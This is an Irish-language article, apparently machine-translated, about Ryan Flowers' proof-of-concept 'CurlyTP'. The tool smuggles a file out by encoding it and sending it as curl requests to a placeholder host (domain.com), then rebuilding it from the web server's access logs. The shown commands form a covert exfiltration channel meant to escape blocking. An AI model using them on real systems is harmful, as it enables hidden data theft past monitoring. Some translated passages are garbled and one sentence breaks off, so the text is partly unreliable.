De réir sainmhíniú Vicipéid, is uirlis chomhcheilg é titim marbh a fhreastalaíonn ar fhaisnéis nó roinnt míreanna a mhalartú idir daoine a úsáideann suíomh rúnda. Is é an smaoineamh nach gcomhlíonann daoine riamh - ach malartaíonn siad faisnéis fós chun sábháilteacht oibriúcháin a chothabháil.
Níor cheart aird a tharraingt ar an áit i bhfolach. Mar sin, sa domhan as líne is minic a úsáideann siad rudaí discréideach: bríce scaoilte sa bhalla, leabhar leabharlainne, nó log i gcrann.
Tá go leor uirlisí criptithe agus anaithnidithe ar an Idirlíon, ach tarraingíonn an-aird ar úsáid na n-uirlisí seo. Ina theannta sin, féadfar iad a bhlocáil ar an leibhéal corparáideach nó rialtais. Cad atá le déanamh?
Mhol an forbróir Ryan Flowers rogha suimiúil -
Tharlaíonn sé go gceadaíonn aon fhreastalaí gréasáin leat a shábháil beagnach aon teachtaireacht sa logáil. Bláthanna wondered conas é seo a úsáid.
Tairgeann sé an rogha seo:
- Tóg comhad téacs (teachtaireacht rúnda) agus ríomh an hash (md5sum).
- Ionchódaímid é (gzip + uuencode).
- Scríobhaimid chuig an loga ag baint úsáide as iarratas mícheart d'aon ghnó chuig an bhfreastalaí.
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh
Chun comhad a léamh, ní mór duit na hoibríochtaí seo a dhéanamh in ord droim ar ais: an comhad a dhíchódú agus a dhízipeáil, seiceáil an hash (is féidir an hash a tharchur go sábháilte thar bhealaí oscailte).
Cuirtear spásanna in ionad =+=
ionas nach mbeidh spásanna sa seoladh. Úsáideann an clár, a dtugann an t-údar CurlyTP air, úsáid as ionchódú base64, cosúil le ceangaltáin ríomhphoist. Déantar an t-iarratas le eochairfhocal ?transfer?
ionas gur féidir leis an bhfaighteoir é a fháil go héasca sna logaí.
Cad a fheicimid sna logs sa chás seo?
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"
Mar a luadh cheana, chun teachtaireacht rúnda a fháil ní mór duit na hoibríochtaí a dhéanamh in ord droim ar ais:
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g
Tá an próiseas éasca a uathoibriú. Meaitseálann md5sum, agus deimhníonn ábhar an chomhaid go raibh gach rud díchódaithe i gceart.
Tá an modh an-simplí. “Is é an pointe atá leis an gcleachtadh seo ná a chruthú gur féidir comhaid a aistriú trí iarratais bheaga neamhchiontacha ghréasáin, agus oibríonn sé ar aon fhreastalaí gréasáin le logaí gnáth-théacs. Go bunúsach, is áit cheilte é gach freastalaí gréasáin!” a scríobhann Flowers.
Ar ndóigh, ní oibríonn an modh ach amháin má tá rochtain ag an bhfaighteoir ar logaí freastalaí. Ach cuireann go leor óstach rochtain den sórt sin ar fáil, mar shampla.
Conas é a úsáid?
Deir Ryan Flowers nach saineolaí slándála faisnéise é agus ní thiomsóidh sé liosta úsáidí féideartha do CurlyTP. Dó, níl ann ach cruthúnas coincheapa gur féidir na huirlisí coitianta a fheicimid gach lá a úsáid ar bhealach neamhghnáthúil.
Go deimhin, tá roinnt buntáistí ag baint leis an modh seo thar “seithí” freastalaí eile
Is é seo ceann de na bealaí chun teachtaireachtaí a tharchur trí chomhaid seirbhíse. Is féidir leat cuimhneamh ar conas a d'úsáid roinnt cuideachtaí ardchéime
Ba é an smaoineamh nach bhfeicfeadh ach forbróirí gréasáin an ubh Cásca seo, mar ní bhreathnódh gnáthdhuine ar na ceanntásca nó ar an gcód HTML.
Foinse: will.com